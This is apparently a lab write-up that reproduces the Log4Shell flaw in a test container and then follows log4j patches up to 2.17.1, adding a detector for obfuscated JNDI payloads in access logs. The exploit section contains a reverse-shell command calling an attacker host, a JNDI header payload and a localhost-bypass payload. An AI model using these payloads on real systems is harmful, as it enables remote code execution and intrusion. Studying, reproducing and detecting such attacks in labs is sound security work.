Follow log4j vulnerability: from 2.14.1 to 2.17.1
I triggered a log4j vulnerability for a test and followed patches from 2.14.1 to 2.17.1 of log4j.
How to trigger log4j vulnerability
There are several vulnerabilities in log4j. Among them, I chose CVE-2021-44228 and triggered a reverse shell, i.e. executing shell commands on the victim from a remote machine.
- Build a vulnerable environment: christophetd/log4shell-vulnerable-app. Clone this repository and run `docker build ./`. FYI, this environment is based on spring-boot-starter-log4j2:2.6.1, so it uses log4j 2.14.1.
- Download JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar and run the command below. I added a command that opens a reverse shell; you can change the command inside the quotes after `-C`. The tool prints the `ldap://` and `rmi://` URLs it serves; one of them is the `<TARGET_ENV>` used in the last step.
  `$ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "nc <ATTACKER_IP> 4444 -e /bin/sh" -A <ATTACKER_IP>`
- Open port 4444 with `nc -lvp 4444` on the attacker machine. The `nc` in the `-C` command runs on the victim and connects back to this listener, so its address must be the listener's address (in a single-host Docker test the attacker and the victim are the same host). The victim's `nc` also has to support `-e` (nc.traditional or ncat do; the OpenBSD variant does not).
- Send the header with the command below.
  `curl <VICTIM_IP>:8080 -H 'X-Api-Version:${jndi:<TARGET_ENV>}'`
The result looks like this: in the top-right window you can see that the `ls` command, typed into the listener, runs on the victim, so the reverse shell is working.
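The request above leaves the payload in the victim's access log, and that is where a defender looks for it. The following is an added detection example (my code, not from the original post and not part of the exploit tool or the vulnerable app): it scans constructed access-log lines for the header payload, going beyond the page's plain `${jndi:` form to the nested-lookup spellings log4j itself evaluates (`${lower:j}`, the `${::-j}` default-value syntax) and to the `127.0.0.1#` host form used against 2.15.0 later on this page. The log lines and the address 203.0.113.7 are constructed for the example.

```python
import re
from typing import List, Optional

# Constructed sample access-log lines (not from the original post). Line 1 is the
# plain payload sent by the curl command above; lines 2-3 carry the same lookup in
# log4j's nested-lookup spellings; line 4 uses the 2.15.0 localhost-bypass host form;
# line 5 is a benign request. 203.0.113.7 stands in for the attacker's address.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [10/Dec/2021:13:01:02 +0000] "GET / HTTP/1.1" 200 '
    'X-Api-Version="${jndi:ldap://203.0.113.7:1389/o0ojzb}"',
    '10.0.0.5 - - [10/Dec/2021:13:01:09 +0000] "GET / HTTP/1.1" 200 '
    'X-Api-Version="${${lower:J}ndi:ldap://203.0.113.7:1389/o0ojzb}"',
    '10.0.0.5 - - [10/Dec/2021:13:01:15 +0000] "GET / HTTP/1.1" 200 '
    'X-Api-Version="${${::-j}${::-n}${::-d}${::-i}:${::-l}dap://203.0.113.7:1389/a}"',
    '10.0.0.5 - - [10/Dec/2021:13:02:40 +0000] "GET / HTTP/1.1" 200 '
    'X-Api-Version="${jndi:ldap://127.0.0.1#203.0.113.7:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:13:03:00 +0000] "GET / HTTP/1.1" 200 '
    'X-Api-Version="1.0.0"',
]

# An innermost ${...}: no '$', '{' or '}' inside, so nested lookups fold inside-out,
# which is the order log4j's string substitution evaluates them.
_INNERMOST = re.compile(r'\$\{([^${}]*)\}')


def _fold(body: str) -> Optional[str]:
    """Reduce one innermost lookup body to the literal an attacker spelled with it.
    Modelled: ${lower:x}, ${upper:x} and the default-value form ${key:-x}
    (so ${::-x} becomes x). Any other lookup is left in place (None)."""
    if body.startswith("lower:"):
        return body[len("lower:"):].lower()
    if body.startswith("upper:"):
        return body[len("upper:"):].upper()
    if ":-" in body:
        return body.split(":-", 1)[1]
    return None


def deobfuscate(text: str, max_rounds: int = 32) -> str:
    """Fold nested lookups until nothing changes; max_rounds bounds pathological input."""
    for _ in range(max_rounds):
        changed = False

        def _sub(m):
            nonlocal changed
            folded = _fold(m.group(1))
            if folded is None:
                return m.group(0)
            changed = True
            return folded

        text = _INNERMOST.sub(_sub, text)
        if not changed:
            break
    return text


# After folding, the payload reads ${jndi:<scheme>://<host>...}; host stops at ':' or '/'.
_JNDI = re.compile(r'\$\{\s*jndi:([a-z]+)://([^/}\s:]+)', re.IGNORECASE)


def scan_line(line: str) -> Optional[dict]:
    """Return a finding for a line carrying a JNDI lookup, else None."""
    normalized = deobfuscate(line)
    m = _JNDI.search(normalized)
    if m is None:
        return None
    scheme, host = m.group(1).lower(), m.group(2)
    return {
        "scheme": scheme,
        "host": host,
        "obfuscated": normalized != line,    # nested lookups were used to hide 'jndi'
        "localhost_smuggling": "#" in host,  # 127.0.0.1#<attacker> form (2.15.0 bypass)
    }


def scan_lines(lines: List[str]) -> List[dict]:
    return [f for f in (scan_line(line) for line in lines) if f is not None]


if __name__ == "__main__":
    for finding in scan_lines(SAMPLE_LOG_LINES):
        print(finding)
```

Folding innermost lookups first mirrors how log4j evaluates them, so a rule written against the normalized text catches spellings that never contain the literal string `jndi`. The folding only models the prefix-free transforms (`lower`, `upper`, default values); a real `${env:...}` or `${sys:...}` is left in place rather than guessed at.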
Follow patches
All the changes in each log4j version are listed here: Log4j – Changes. I picked only the patches related to vulnerabilities and summarize them below.
In 2.15.0, the method I wrote above no longer works: lookups inside the logged message are not evaluated by default, and JNDI LDAP connections are restricted to localhost. It is still vulnerable through `jndi` when the logging configuration itself evaluates attacker-controlled data, i.e. a non-default pattern such as `${ctx:...}` over a Thread Context value. The localhost restriction can be bypassed by adding `127.0.0.1#` right after `ldap://` (for example `${jndi:ldap://127.0.0.1#<ATTACKER_IP>:1389/a}`): the allowlist check parses the URI and sees `127.0.0.1` as the host, because `#` starts the fragment, while the LDAP client treats the whole `127.0.0.1#<ATTACKER_IP>` as the host name. This incomplete fix is CVE-2021-45046.
Because of this `jndi` issue, JNDI is disabled by default in 2.16.0, and message lookups were removed entirely.
If your service uses log4j, updating to 2.17.1 is now highly recommended. 2.17.0 and 2.17.1 fix further issues found after 2.16.0 (CVE-2021-45105, uncontrolled recursion in lookup evaluation, and CVE-2021-44832, code execution through the JDBC appender when an attacker can modify the logging configuration), so stopping at 2.16.0 is not enough.
References
- The Worst Ever! Log4J Hacker Attacks. How to Respond?
- Apache log4j Vulnerability CVE-2021-44228 POC
- How Log4j Vulnerability Could Impact You
- Analysing and Reproducing PoC for Log4j 2.15.0
💬 Any comments and suggestions will be appreciated.